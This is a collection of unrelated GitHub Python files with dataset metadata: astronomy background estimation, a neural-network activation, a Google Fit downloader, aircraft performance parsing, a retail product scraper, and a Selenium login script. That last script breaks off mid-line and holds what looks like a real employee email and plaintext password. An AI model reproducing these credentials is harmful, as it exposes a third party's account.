data_store.obs(obs_id=23523).events###110380\nevents = data_store.obs(obs_id=110380).events\ncounts_image = SkyImage.empty_like(ref_image)\ncounts_image.fill_events(events)\n\n\nnorm = simple_norm(counts_image.data, stretch='sqrt', min_cut=0, max_cut=0.3)#0.3\nq1=counts_image.smooth(radius=0.1 * u.deg).plot(norm=norm, add_cbar=True)\nq=counts_image.cutout(position=SkyCoord(-5, 0, unit='deg', frame='galactic'),size=(20*u.deg, 20*u.deg)).smooth(radius=0.1 * u.deg).plot(norm=norm, add_cbar=True)\n#plt.show(counts_image)\nif(show_it==False):\n plt.show(q)\n \n#obs_ids = [23523, 23526] ###[111140, 111159]\nobs_ids = [110380,111140, 111159]\ncounts_image2 = SkyImage.empty_like(ref_image)\nfor obs_id in obs_ids:\n events = data_store.obs(obs_id=obs_id).events\n counts_image2.fill_events(events)\n\nnorm = simple_norm(counts_image2.data, stretch='sqrt', min_cut=0, max_cut=0.5)#0.5\ncounts_image2.smooth(radius=0.1 * u.deg).plot(norm=norm, add_cbar=True)\n\n\nq2=counts_image2#.cutout(position=SkyCoord(0, 0, unit='deg', frame='galactic'),size=(10*u.deg, 10*u.deg)).plot(norm=norm, add_cbar=True)\nif(show_it==False):\n plt.show(q2)\n\n\nprint(\"2\")\n\n\n################QUI C'è IL CONTO SUL BKG\n\n\nsource_kernel = Tophat2DKernel(radius=5)#5\nsource_kernel.normalize(mode='peak')\nsource_kernel = source_kernel.array\n\nbackground_kernel = Ring2DKernel(radius_in=5, width=20)#20-10\nbackground_kernel.normalize(mode='peak')\nbackground_kernel = background_kernel.array\n\n\na = plt.imshow(source_kernel, interpolation='nearest', cmap='gray')\nplt.colorbar()\nplt.grid('off')\nif(show_it==False):\n plt.show(a)\n\nb = plt.imshow(background_kernel, interpolation='nearest', cmap='gray')\nplt.colorbar()\nplt.grid('off')\nif(show_it==False):\n plt.show(b)\n# To use the `KernelBackgroundEstimator` you first have to set\n# up a source and background kernel and put the counts image input\n# into a container `SkyImageList` class.\nimages = SkyImageList()\nimages['counts'] = counts_image2\n\nprint(\"3\")\n\nkbe = KBE(\n kernel_src=source_kernel,\n kernel_bkg=background_kernel,\n significance_threshold=5,\n mask_dilation_radius=0.06 * u.deg,\n)\n# This takes about 10 seconds on my machine\nresult2 = kbe.run(images)\nprint(\"results2\")\nprint(result2.names)\n####altro modo stima bkg\n\nobs_list = data_store.obs_list(obs_ids)\ntarget_position = SkyCoord(0, 0, unit='deg', frame='galactic')\non_radius = 0.3 * u.deg\non_region = CircleSkyRegion(center=target_position, radius=on_radius)\n\nexclusion_mask = ref_image.region_mask(on_region)\nexclusion_mask.data = 1 - exclusion_mask.data\nbkg_estimator = RingBackgroundEstimator(\n r_in=0.5 * u.deg,\n width=0.2 * u.deg,\n)\nimage_estimator = IACTBasicImageEstimator(\n reference=ref_image,\n emin=100 * u.GeV,\n emax=100 * u.TeV,\n #offset_max=3 * u.deg,\n background_estimator=bkg_estimator,\n exclusion_mask=exclusion_mask,\n)\nimages_new = image_estimator.run(obs_list)\nprint(\"\\n\\n\\n\")\nprint(images_new.names)\nprint(result2.names)\nprint(\"\\n\\n\\n\")\n# Let's have a look at the background image and the exclusion mask\n\n# This doesn't work yet ... need to do SkyImage.plot fixes:\n# fig, axes = plt.subplots(nrows=1, ncols=3, figsize=(10, 3))\n# background_image.plot(ax=axes[0])\n# exclusion_image.plot(ax=axes[1])\n# significance_image.plot(ax=axes[2])\nprint(\"bkg metodo 1\")\nbackground_image = result2['background']\nbackground_image2 = images_new['background']\nnorm = simple_norm(background_image.data, stretch='sqrt', min_cut=0, max_cut=0.5)\nbackground_image.plot(norm=norm, add_cbar=True)\nif(show_it==False):\n plt.show(background_image.plot(norm=norm, add_cbar=True))\nnorm2 = simple_norm(background_image2.data, stretch='sqrt', min_cut=0, max_cut=0.5)\nbackground_image2.plot(norm=norm, add_cbar=True)\nprint(\"bkg metodo 2\")\nif(show_it==False):\n plt.show(background_image2.plot(norm=norm, add_cbar=True))\n plt.show(background_image.cutout(position=SkyCoord(0, 0, unit='deg', frame='galactic'),size=(2*u.deg, 2*u.deg)))\nresult2['exclusion'].plot()\nif(show_it==True):\n plt.show(result2['exclusion'].plot())\n plt.show(result2['background'].plot())\n plt.show(images_new['background'].plot())\n plt.show(result2['background'].cutout(position=SkyCoord(0, 0, unit='deg', frame='galactic'),size=(2*u.deg,2*u.deg)).plot())\n plt.show(images_new['background'].cutout(position=SkyCoord(0, 0, unit='deg', frame='galactic'),size=(2*u.deg, 2*u.deg)).plot())\n\nsignificance_image = result2['significance']\nc=significance_image.cutout(position=SkyCoord(0, 0, unit='deg', frame='galactic'),size=(2*u.deg, 5*u.deg)).plot(add_cbar=True, vmin=0, vmax=20)\nif(show_it==False):\n plt.show(c)\nprint(\"4\")\nif(show_it==False):\n plt.show(images_new['psf'].plot())\n plt.show(images_new['excess'].cutout(position=SkyCoord(0, 0, unit='deg', frame='galactic'),size=(2*u.deg, 2*u.deg)).plot())\n","repo_name":"ltostirepository/prova","sub_path":"gammapy/geminga.py","file_name":"geminga.py","file_ext":"py","file_size_in_byte":10466,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"72"} +{"seq_id":"23461754284","text":"import numpy as np\nimport torch\nfrom torch import nn\nfrom torch.nn import functional as F\n\n# Source: https://github.com/hwang-ua/fta_pytorch_implementation/blob/main/core/lta.py\nclass FTA(nn.Module):\n def __init__(self, input_dim, tiles=20, bound_low=-2, bound_high=2, eta=0.2):\n super(FTA, self).__init__()\n # 1 tiling, binning\n self.n_tilings = 1\n self.n_tiles = tiles\n self.bound_low, self.bound_high = bound_low, bound_high\n self.delta = (self.bound_high - self.bound_low) / self.n_tiles\n c_mat = torch.as_tensor(np.array([self.delta * i for i in range(self.n_tiles)]) + self.bound_low, dtype=torch.float32)\n self.register_buffer('c_mat', c_mat)\n self.eta = eta\n self.d = input_dim\n\n def forward(self, reps):\n temp = reps\n temp = temp.reshape([-1, self.d, 1])\n onehots = 1.0 - self.i_plus_eta(self.sum_relu(self.c_mat, temp))\n out = torch.reshape(torch.reshape(onehots, [-1]), [-1, int(self.d * self.n_tiles * self.n_tilings)])\n return out\n\n def sum_relu(self, c, x):\n out = F.relu(c - x) + F.relu(x - self.delta - c)\n return out\n\n def i_plus_eta(self, x):\n if self.eta == 0:\n return torch.sign(x)\n out = (x <= self.eta).type(torch.float32) * x + (x > self.eta).type(torch.float32)\n return out","repo_name":"ejmejm/RL-Representation","sub_path":"src/rl_cookbook/models/activations.py","file_name":"activations.py","file_ext":"py","file_size_in_byte":1360,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"72"} +{"seq_id":"1523443145","text":"# Import necessary libraries\nimport json\nimport pandas as pd\nfrom datetime import datetime\nimport requests\n\n# Defining the api urls for steps and calories data\nbaseurl_steps = 'https://www.googleapis.com/fitness/v1/users/me/dataSources/derived:com.google.step_count.delta:com.google.android.gms:merge_step_deltas/datasets/1532476800000000000-1633345410000000000'\nbaseurl_calories = 'https://www.googleapis.com/fitness/v1/users/me/dataSources/derived:com.google.calories.expended:com.google.android.gms:merge_calories_expended/datasets/1532476800000000000-1633345410000000000'\n\n# Specify certain parameters needed to retrieve api calls\nparams = {\n \"access_token\": \"Enter token here\",\n \"scope\": \"https://www.googleapis.com/auth/fitness.activity.read\",\n \"token_type\": \"Bearer\",\n \"expires_in\": 3599,\n \"refresh_token\": \"Enter refresh token here\"\n}\n\n\n# Response function returns a JSON output and writes it to a file\ndef response(url, filename):\n response = requests.get(url, params=params)\n response_json = response.json()\n open_file = open(filename, 'w')\n open_file.write(json.dumps(response_json, indent=4))\n open_file.close()\n return 'JSON was written to the specified file'\n\n\n# Writing the json output to a specified file\nresponse(baseurl_steps, 'Steps_googlefit.json')\nresponse(baseurl_calories, 'Calories_googlefit.json')\n\n# Reading the files and loading it as a JSON to query results\ndata_calorie = open('Calories_googlefit.json').read()\ndata_steps = open('Steps_googlefit.json').read()\ndata_weight = open('Body weight user inputted.json').read()\ndata_height = open('Body height user inputted.json').read()\nopenjson_calories, openjson_steps, openjson_weight, openjson_height = json.loads(\n data_calorie), json.loads(data_steps), json.loads(data_weight), json.loads(data_height)\n\n# Defining lists for storing the data\nlist_of_lists_calories = []\nlist_of_lists_steps = []\n\n# Querying the calorie information\nfor rows in openjson_calories['point']:\n list_of_indi_calories = []\n\n def values(tag):\n return rows[tag]\n\n calories_startime, calories_endtime = values(\n \"startTimeNanos\"), values(\"endTimeNanos\")\n calories = rows[\"value\"][0][\"fpVal\"]\n\n int_starttime_calories, int_endtime_calories = int(\n calories_startime)//1000000000, int(calories_endtime)//1000000000\n\n starttime_calories = datetime.fromtimestamp(\n int_endtime_calories).strftime('%Y-%m-%d %H:%M:%S')\n\n endtime_calories = datetime.fromtimestamp(\n int_endtime_calories).strftime('%Y-%m-%d %H:%M:%S')\n\n # Storing the calories columns in a list\n list_of_indi_calories.append(starttime_calories)\n list_of_indi_calories.append(endtime_calories)\n list_of_indi_calories.append(calories)\n list_of_lists_calories.append(list_of_indi_calories)\n\n# Querying the steps information\nfor rows_steps in openjson_steps['point']:\n list_of_indi_steps = []\n\n def values_steps(tag):\n return rows_steps[tag]\n steps_startime, steps_endtime = values_steps(\n \"startTimeNanos\"), values_steps(\"endTimeNanos\")\n steps = rows_steps[\"value\"][0][\"intVal\"]\n steps_int_starttime, steps_int_endtime = int(\n steps_startime)//1000000000, int(steps_endtime)//1000000000\n starttime_steps = datetime.fromtimestamp(\n steps_int_starttime).strftime('%Y-%m-%d %H:%M:%S')\n endtime_steps = datetime.fromtimestamp(\n steps_int_endtime).strftime('%Y-%m-%d %H:%M:%S')\n\n # Storing the steps columns in a list\n list_of_indi_steps.append(starttime_steps)\n list_of_indi_steps.append(endtime_steps)\n list_of_indi_steps.append(steps)\n list_of_lists_steps.append(list_of_indi_steps)\n\n\n# Converting the lists into pandas dataframe\ndf_calories = pd.DataFrame(list_of_lists_calories, columns=[\n \"starttime_calories\", \"endtime_calories\", \"calories\"])\ndf_steps = pd.DataFrame(list_of_lists_steps, columns=[\n \"starttime_steps\", \"endtime_steps\", \"steps\"])\n\n# Storing the dataframe in csv files\ndf_calories.to_csv('calories.csv')\ndf_steps.to_csv('steps.csv')\n","repo_name":"inspiration07/MyFitness","sub_path":"Googlefit API.py","file_name":"Googlefit API.py","file_ext":"py","file_size_in_byte":4039,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"72"} +{"seq_id":"29508559559","text":"\"\"\" BlueSky aircraft performance calculations.\"\"\"\r\nfrom xml.etree import ElementTree\r\nfrom math import *\r\nimport numpy as np\r\nfrom bluesky.tools.aero import ft, g0, rho0, kts, lbs, inch, sqft, fpm\r\n\r\nfrom .performance import esf, phases, calclimits, PHASE\r\nimport bluesky as bs\r\n\r\n# Register settings defaults\r\nbs.settings.set_variable_defaults(perf_path='performance/BS', verbose=False)\r\n\r\nclass CoeffBS:\r\n \"\"\"\r\n Coefficient class definition : get aircraft-specific coefficients from database\r\n Created by : Isabel Metz\r\n\r\n References:\r\n\r\n - D.P. Raymer. Aircraft Design: A Conceptual Approach. AIAA Education Series.\r\n American Institute of Aeronautics and Astronautics, Inc., Reston, U.S, fifth edition, 2012.\r\n - R. Babikian. The Historical Fuel Efficiency Characteristics of Regional Aircraft from\r\n Technological, Operational, and Cost Perspectives. Master's Thesis, Massachusetts\r\n Institute of Technology, Boston, U.S.\r\n \"\"\"\r\n\r\n def convert(self, value, unit):\r\n factors = {'kg': 1., 't':1000., 'lbs': lbs, 'N': 1., 'W': 1, \\\r\n 'm':1.,'km': 1000., 'inch': inch,'ft': ft, \\\r\n 'sqm': 1., 'sqft': sqft, 'sqin': 0.0254*0.0254 ,\\\r\n 'm/s': 1., 'km/h': 1./3.6, 'kts': kts, 'fpm': fpm, \\\r\n \"kg/s\": 1., \"kg/m\": 1./60., 'mug/J': 0.000001, 'mg/J': 0.001 ,\r\n \"kW\": 1000.,\"kN\":1000.,\r\n \"\":1.}\r\n\r\n if unit in factors:\r\n converted = factors[unit] * float(value)\r\n\r\n else:\r\n converted = float(value)\r\n if not self.warned:\r\n print(\"traf/perf.py convert function: Unit mismatch. Could not find \", unit)\r\n self.warned = True\r\n\r\n return converted\r\n\r\n\r\n def coeff(self):\r\n\r\n # aircraft\r\n self.atype = [] # aircraft type\r\n self.j_ac = [] # list of all jet aircraft\r\n self.tp_ac = [] # list of all turboprop aircraft\r\n\r\n # engine\r\n self.etype = [] # jet / turboprop\r\n self.engines = [] # engine types avaliable per aircraft type\r\n self.j_engines = [] # engine types for jet aircraft\r\n self.tp_engines= [] # engine types for turboprop aircraft\r\n self.n_eng = [] # number of engines\r\n\r\n # weights\r\n self.MTOW = [] # maximum takeoff weight\r\n\r\n # speeds\r\n self.max_spd = [] # maximum CAS\r\n self.cr_Ma = [] # nominal cruise Mach at 35000 ft\r\n self.cr_spd = [] # cruise speed\r\n self.max_Ma = [] # maximum Mach\r\n self.gr_acc = [] # ground acceleration\r\n self.gr_dec = [] # ground deceleration\r\n\r\n # limits\r\n self.vmto = [] # minimum speed during takeoff\r\n self.vmld = [] # minimum speed during landing\r\n self.clmax_cr = [] # max. cruise lift coefficient\r\n self.max_alt = [] # maximum altitude\r\n\r\n # dimensions\r\n #span = [] # wing span\r\n self.Sref = [] # reference wing area\r\n #wet_area = [] # wetted area\r\n\r\n # aerodynamics\r\n #Cfe = [] # equivalent skin friction coefficient (Raymer, p.428)\r\n self.CD0 = [] # parasite drag coefficient\r\n #oswald = [] # oswald factor\r\n self.k = [] # induced drag factor\r\n\r\n # scaling factors for drag (FAA_2005 SAGE)\r\n # order of flight phases: TO, IC, CR ,AP, LD ,LD gear\r\n self.d_CD0j = [1.476, 1.143,1.0, 1.957, 3.601, 1.037]\r\n self.d_kj = [1.01, 1.071, 1.0 ,0.992, 0.932, 1.0]\r\n self.d_CD0t = [1.220, 1.0, 1.0, 1.279, 1.828, 0.496]\r\n self.d_kt = [0.948, 1.0, 1.0, 0.94, 0.916, 1.0]\r\n\r\n # bank angles per phase. Order: TO, IC, CR, AP, LD. Currently already in CTraffic\r\n # self.bank = np.deg2rad(np.array([15,35,35,35,15]))\r\n\r\n # flag: did we already warn about invalid input unit?\r\n self.warned = False\r\n\r\n # parse AC files\r\n\r\n path = bs.resource(bs.settings.perf_path) / 'BS/aircraft'\r\n for fname in path.iterdir():\r\n acdoc = ElementTree.parse(fname)\r\n\r\n #actype = doc.find('ac_type')\r\n self.atype.append(acdoc.find('ac_type').text)\r\n\r\n # engine\r\n self.etype.append(int(acdoc.find('engine/eng_type').text))\r\n\r\n # store jet and turboprop aircraft in seperate lists for accessing specific engine data\r\n if int(acdoc.find('engine/eng_type').text) ==1:\r\n self.j_ac.append(acdoc.find('ac_type').text)\r\n\r\n elif int(acdoc.find('engine/eng_type').text) ==2:\r\n self.tp_ac.append(acdoc.find('ac_type').text)\r\n\r\n self.n_eng.append(float(acdoc.find('engine/num_eng').text))\r\n\r\n engine = []\r\n for eng in acdoc.findall('engine/eng'):\r\n engine.append(eng.text)\r\n\r\n # weights\r\n MTOW = self.convert(acdoc.find('weights/MTOW').text, acdoc.find('weights/MTOW').attrib['unit'])\r\n\r\n self.MTOW.append(MTOW)\r\n\r\n MLW= self.convert(acdoc.find('weights/MLW').text, acdoc.find('weights/MLW').attrib['unit'])\r\n\r\n # dimensions\r\n # wingspan\r\n span = self.convert(acdoc.find('dimensions/span').text, acdoc.find('dimensions/span').attrib['unit'])\r\n # reference surface area\r\n S_ref = self.convert(acdoc.find('dimensions/wing_area').text, acdoc.find('dimensions/wing_area').attrib['unit'])\r\n self.Sref.append(S_ref)\r\n\r\n # wetted area\r\n S_wet = self.convert(acdoc.find('dimensions/wetted_area').text, acdoc.find('dimensions/wetted_area').attrib['unit'])\r\n\r\n # speeds\r\n # cruise Mach number\r\n crma = acdoc.find('speeds/cr_MA')\r\n if float(crma.text) == 0.0:\r\n # to be refined\r\n self.cr_Ma.append(0.8)\r\n else:\r\n self.cr_Ma.append(float(crma.text))\r\n\r\n # cruise TAS\r\n crspd = acdoc.find('speeds/cr_spd')\r\n\r\n # to be refined\r\n if float(crspd.text) == 0.0:\r\n self.cr_spd.append(self.convert(250, 'kts'))\r\n else:\r\n self.cr_spd.append(self.convert(acdoc.find('speeds/cr_spd').text, acdoc.find('speeds/cr_spd').attrib['unit']))\r\n\r\n # ground acceleration\r\n # values are based on statistical ADS-B evaluations\r\n # turboprops: 2.12 m/s^2 acceleration,1.12m/s^2 deceleration\r\n if int(acdoc.find('engine/eng_type').text) == 2:\r\n self.gr_acc.append(2.12)\r\n self.gr_dec.append(1.12)\r\n\r\n # turbofans\r\n else:\r\n\r\n # turbofans with two engines: 1.94 m/^2, 1.265m/s^2 deceleration\r\n if float(acdoc.find('engine/num_eng').text) == 2. :\r\n self.gr_acc.append(1.94)\r\n self.gr_dec.append(1.265)\r\n # turbofans with four engines: 1.68 m/s^2, 1.131 m/s^2 deceleration\r\n # assumption: aircraft with three engines have the same value\r\n else :\r\n self.gr_acc.append(1.68)\r\n self.gr_dec.append(1.131)\r\n\r\n\r\n\r\n # limits\r\n # min takeoff speed\r\n tospd = acdoc.find('speeds/to_spd')\r\n # no take-off speed given: calculate via cl_max\r\n if float (tospd.text) == 0.:\r\n clmax_to = float(acdoc.find('aerodynamics/clmax_to').text)\r\n self.vmto.append (sqrt((2*g0)/(S_ref*clmax_to))) # influence of current weight and density follows in CTraffic\r\n else:\r\n tospd = self.convert(acdoc.find('speeds/to_spd').text, acdoc.find('speeds/to_spd').attrib['unit'])\r\n self.vmto.append(tospd/(1.13*sqrt(MTOW/rho0))) # min spd according to CS-/FAR-25.107\r\n # min ic, cr, ap speed\r\n clmaxcr = (acdoc.find('aerodynamics/clmax_cr'))\r\n self.clmax_cr.append(float(clmaxcr.text))\r\n\r\n # min landing speed\r\n ldspd = acdoc.find('speeds/ld_spd')\r\n if float(ldspd.text) == 0. :\r\n clmax_ld = (acdoc.find('aerodynamics/clmax_ld'))\r\n self.vmld.append (sqrt((2*g0)/(S_ref*float(clmax_ld.text)))) # influence of current weight and density follows in CTraffic\r\n else:\r\n ldspd = self.convert(acdoc.find('speeds/ld_spd').text, acdoc.find('speeds/ld_spd').attrib['unit'])\r\n clmax_ld = MLW*g0*2/(rho0*(ldspd*ldspd)*S_ref)\r\n self.vmld.append(ldspd/(1.23*sqrt(MLW/rho0)))\r\n # maximum CAS\r\n maxspd = acdoc.find('limits/max_spd')\r\n if float(maxspd.text) == 0.0:\r\n # to be refined\r\n self.max_spd.append(400.)\r\n else:\r\n self.max_spd.append(self.convert(acdoc.find('limits/max_spd').text, acdoc.find('limits/max_spd').attrib['unit']))\r\n # maximum Mach\r\n maxma = acdoc.find('limits/max_MA')\r\n if float(maxma.text) == 0.0:\r\n # to be refined\r\n self.max_Ma.append(0.8)\r\n else:\r\n self.max_Ma.append(float(maxma.text))\r\n\r\n\r\n # maximum altitude\r\n maxalt = acdoc.find('limits/max_alt')\r\n if float(maxalt.text) == 0.0:\r\n #to be refined\r\n self.max_alt.append(11000.)\r\n else:\r\n self.max_alt.append(self.convert(acdoc.find('limits/max_alt').text, acdoc.find('limits/max_alt').attrib['unit']))\r\n\r\n # aerodynamics\r\n\r\n # parasitic drag - according to Raymer, p. 429\r\n Cfe = float((acdoc.find('aerodynamics/Cfe').text))\r\n self.CD0.append (Cfe*S_wet/S_ref)\r\n\r\n # induced drag\r\n oswald = acdoc.find('aerodynamics/oswald')\r\n if float(oswald.text) == 0.0:\r\n # math method according to Obert 2009, p.542: e = 1/(1.02+0.09*pi*AR) combined with Nita 2012, p.2\r\n self.k.append(1.02/(pi*(span*span/S_ref))+0.009)\r\n else:\r\n oswald = float(acdoc.find('aerodynamics/oswald').text)\r\n self.k.append(1/(pi*oswald*(span*span/S_ref)))\r\n\r\n #users = doc.find( 'engine' )\r\n #for node in users.getiterator():\r\n # print node.tag, node.attrib, node.text, node.tail\r\n\r\n # to collect avaliable engine types per aircraft\r\n # 2do!!! access via console so user may choose preferred engine\r\n # for data file: statistics provided by flightglobal for first choice\r\n # if not declared differently: first engine is taken!\r\n self.engines.append(engine)\r\n\r\n if int(acdoc.find('engine/eng_type').text) ==1:\r\n self.j_engines.append(engine)\r\n\r\n elif int(acdoc.find('engine/eng_type').text) ==2:\r\n self.tp_engines.append(engine)\r\n\r\n # engines\r\n self.enlist = [] # list of all engines\r\n self.jetenlist = [] # list of all jet engines\r\n self.propenlist = [] # list of all turbopropengines\r\n\r\n # a. jet aircraft\r\n self.rated_thrust = [] # rated Thrust (one engine)\r\n self.ffto = [] # fuel flow takeoff\r\n self.ffcl = [] # fuel flow climb\r\n self.ffcr = [] # fuel flow cruise\r\n self.ffid = [] # fuel flow idle\r\n self.ffap = [] # fuel flow approach\r\n self.SFC = [] # specific fuel flow cruise\r\n\r\n\r\n # b. turboprops\r\n self.P = [] # max. power (Turboprops, one engine)\r\n self.PSFC_TO = [] # SFC takeoff\r\n self.PSFC_CR = [] # SFC cruise\r\n\r\n # parse engine files\r\n path = bs.resource(bs.settings.perf_path) / 'BS/engines/'\r\n for fname in path.iterdir():\r\n endoc = ElementTree.parse(fname)\r\n self.enlist.append(endoc.find('engines/engine').text)\r\n\r\n # thrust\r\n # a. jet engines\r\n if int(endoc.find('engines/eng_type').text) ==1:\r\n\r\n # store engine in jet-engine list\r\n self.jetenlist.append(endoc.find('engines/engine').text)\r\n # thrust\r\n self.rated_thrust.append(self.convert(endoc.find('engines/Thr').text, endoc.find('engines/Thr').attrib['unit']))\r\n # bypass ratio\r\n BPRc = int(endoc.find('engines/BPR_cat').text)\r\n # different SFC for different bypass ratios (reference: Raymer, p.36)\r\n SFC = [14.1, 22.7, 25.5]\r\n self.SFC.append(SFC[BPRc])\r\n\r\n # fuel flow: Takeoff, climb, cruise, approach, idle\r\n self.ffto.append(self.convert(endoc.find('ff/ff_to').text, endoc.find('ff/ff_to').attrib['unit']))\r\n self.ffcl.append(self.convert(endoc.find('ff/ff_cl').text, endoc.find('ff/ff_cl').attrib['unit']))\r\n self.ffcr.append(self.convert(endoc.find('ff/ff_cr').text, endoc.find('ff/ff_cr').attrib['unit']))\r\n self.ffap.append(self.convert(endoc.find('ff/ff_ap').text, endoc.find('ff/ff_ap').attrib['unit']))\r\n self.ffid.append(self.convert(endoc.find('ff/ff_id').text, endoc.find('ff/ff_id').attrib['unit']))\r\n\r\n # b. turboprop engines\r\n elif int(endoc.find('engines/eng_type').text) ==2:\r\n\r\n # store engine in prop-engine list\r\n self.propenlist.append(endoc.find('engines/engine').text)\r\n\r\n # power\r\n self.P.append(self.convert(endoc.find('engines/Power').text, endoc.find('engines/Power').attrib['unit']))\r\n # specific fuel consumption: takeoff and cruise\r\n PSFC_TO = self.convert(endoc.find('SFC/SFC_TO').text, endoc.find('SFC/SFC_TO').attrib['unit'])\r\n self.PSFC_TO.append(PSFC_TO)\r\n # according to Babikian (function based on PSFC in [mug/J]), input in [kg/J]\r\n self.PSFC_CR.append(self.convert((0.7675*PSFC_TO*1000000.0 + 23.576), 'mug/J'))\r\n # print PSFC_TO, self.PSFC_CR\r\n\r\n # Turn relevant ones into numpy arrays\r\n\r\n self.MTOW=np.array(self.MTOW)\r\n self.Sref=np.array(self.Sref)\r\n self.etype=np.array(self.etype)\r\n self.cr_Ma=np.array(self.cr_Ma)\r\n self.cr_spd=np.array(self.cr_spd)\r\n self.gr_acc=np.array(self.gr_acc)\r\n self.gr_dec=np.array(self.gr_dec)\r\n self.vmto=np.array(self.vmto)\r\n self.vmld=np.array(self.vmld)\r\n self.max_Ma=np.array(self.max_Ma)\r\n self.max_spd=np.array(self.max_spd)\r\n self.max_alt=np.array(self.max_alt)\r\n self.CD0=np.array(self.CD0)\r\n self.k=np.array(self.k)\r\n self.clmax_cr=np.array(self.clmax_cr)\r\n self.n_eng=np.array(self.n_eng)\r\n self.P=np.array(self.P)\r\n self.PSFC_TO=np.array(self.PSFC_TO)\r\n self.PSFC_CR=np.array(self.PSFC_CR)\r\n self.rated_thrust=np.array(self.rated_thrust)\r\n self.SFC=np.array(self.SFC)\r\n self.ffto=np.array(self.ffto)\r\n self.ffcl=np.array(self.ffcl)\r\n self.ffcr=np.array(self.ffcr)\r\n self.ffid=np.array(self.ffid)\r\n self.ffap=np.array(self.ffap)\r\n","repo_name":"TUDelft-CNS-ATM/bluesky","sub_path":"bluesky/traffic/performance/legacy/coeff_bs.py","file_name":"coeff_bs.py","file_ext":"py","file_size_in_byte":15336,"program_lang":"python","lang":"en","doc_type":"code","stars":299,"dataset":"github-code","pt":"72"} +{"seq_id":"15871642219","text":"import json\nimport locale\nimport re\nfrom datetime import datetime\n\nimport requests\nfrom oster.custom_settings.oster_settings import settings\nfrom scrapy.http import Request\nfrom scrapy.spiders import SitemapSpider\n\nlocale.setlocale(locale.LC_ALL, 'en_US.UTF-8')\n\n\nclass OsterSpider(SitemapSpider):\n name = 'oster_crawler'\n allowed_domains = ['www.oster.com.br']\n sitemap_urls = ['https://www.oster.com.br/sitemap/sitemap.xml']\n sitemap_rules = [('', 'parse_listpage')]\n\n sitemap_follow = [\n r'[\\d\\w:/.](category-)[\\d\\w:/.]'\n ]\n\n other_urls: list[str] = []\n\n custom_settings = settings()\n\n def parse_listpage(self, response):\n urlspage_jscript = []\n\n var_pagecount = response.xpath(\n '//*/div/script[contains(@type,\"text/javascript\")]/text()'\n ).getall()\n for text in var_pagecount:\n char_identif = \"var pagecount\"\n prefix_identif = \").load('\"\n sufix_identif = \"' + pageclickednumber\"\n if char_identif in text:\n url_standard_jscript = text.split(\n prefix_identif)[-1].split(sufix_identif)[0]\n url_standard_jscript = url_standard_jscript.strip()\n url_standard_jscript = re.sub(\n \"(PS=\\\\d+)\", \"PS=50\", url_standard_jscript)\n\n page = 1\n\n while True:\n page_jscript = \"\".join(\n (\"https://\", self.allowed_domains[0],\n url_standard_jscript, str(page)))\n\n page += 1\n\n payload = {}\n headers = {}\n\n request_nextpage = requests.get(\n url=page_jscript, headers=headers, data=payload)\n size_nextpage = len(request_nextpage.text)\n\n if size_nextpage < 10:\n break\n urlspage_jscript.append(page_jscript)\n\n for url_jscript in urlspage_jscript:\n yield Request(url=url_jscript, callback=self.parse)\n\n def parse(self, response):\n url_products = response.xpath(\n '//*[contains(@class,\"shelf-product\")]/*/h3/a/@href').getall()\n for url in url_products:\n yield Request(url=url, callback=self.parse_product)\n\n def parse_product(self, response):\n json_addData = response.xpath('//*/script/text()').getall()\n for text in json_addData:\n prefix_identif = \"vtex.events.addData(\"\n sufix_identif = \");\"\n if prefix_identif in text:\n data_json = text.split(\n prefix_identif)[-1].split(sufix_identif)[0]\n data_json = data_json.strip()\n data_json = json.loads(data_json)\n\n pageUrl = data_json[\"pageUrl\"]\n\n if \"404\" in pageUrl:\n raise '=== Produto Esgotado ==='\n\n for text in json_addData:\n prefix_identif_2 = \"skuJson_0 =\"\n sufix_identif_2 = \";CATALOG_SDK\"\n if prefix_identif_2 in text:\n data_json_2 = text.split(\n prefix_identif_2)[-1].split(sufix_identif_2)[0]\n data_json_2 = data_json_2.strip()\n data_json_2 = json.loads(data_json_2)\n\n price = data_json[\"productPriceTo\"]\n try:\n price = locale.atof(price)\n except ValueError:\n pass\n name = data_json_2[\"name\"]\n try:\n gtin = data_json[\"productEans\"]\n except None:\n gtin = None\n sku = [key for key, value in data_json[\"skuStocks\"].items()]\n\n currency = data_json_2[\"skus\"][0][\"taxFormated\"].split()[0]\n seller = data_json_2[\"skus\"][0][\"seller\"]\n category = data_json[\"productCategoryName\"]\n image = data_json_2[\"skus\"][0][\"image\"]\n created_at = datetime.now().strftime(\"%Y-%m-%d %H:%M:%S\")\n\n yield {\n \"gtin\": gtin,\n \"name\": name,\n \"currency\": currency,\n \"price\": price,\n \"category\": category,\n \"sku\": sku,\n \"seller\": seller,\n \"pageUrl\": pageUrl,\n \"image\": image,\n \"created_at\": created_at,\n }\n","repo_name":"oliveira-bs/Crawler_Oster","sub_path":"oster/spiders/oster.py","file_name":"oster.py","file_ext":"py","file_size_in_byte":4250,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"72"} +{"seq_id":"11636533122","text":"from selenium import webdriver\nfrom selenium.webdriver.common.keys import Keys\nfrom selenium.webdriver.common.by import By\nfrom selenium.webdriver.support.ui import WebDriverWait\nfrom selenium.webdriver.support.ui import Select\nfrom selenium.webdriver.support import expected_conditions as EC\nimport time\nimport warnings\nwarnings.filterwarnings(\"ignore\")\n\nPATH = \"C:\\Program Files (x86)\\chromedriver.exe\"\nkodok = webdriver.Chrome(PATH)\n\nkodok.get(\"http://kodok.me/\")\t\t\t\t\t#open website Kodok\nprint(kodok.title)\n\n#==========================LOGIN=================================\nemail = kodok.find_element_by_id('email')\nemail.send_keys(\"aufar.rizqi@artajasa.co.id\")\n\npwd = kodok.find_element_by_id(\"password\")\npwd.send_keys(\"opensesaMe16?!\")\n\nlogin = kodok.find_element_by_name(\"login\")\nlogin.click()\n\n#=======================CHOOSE ROLE==============================\ntry:\n\t#pilih role yg mau dimasukkin. pilihan id: login_manager / login_admin / login_engineer\n\trole = WebDriverWait(kodok, 10).until(\n\t\tEC.presence_of_element_located((By.ID, \"login_manager\"))\n\t)\n\n\trole.click()\t#klik tombol rolenya\n\n\tlistp = WebDriverWait(kodok, 10).until(\n\t\tEC.presence_of_element_located((By.ID, \"listpage\"))\n\t)\n\n\tlistp.click()\t#klik tombol rolenya\n\n#########################################################################Generate Excel\n\telement = WebDriverWait(kodok, 10).until(\n\t\tEC.presence_of_element_located((By.ID, 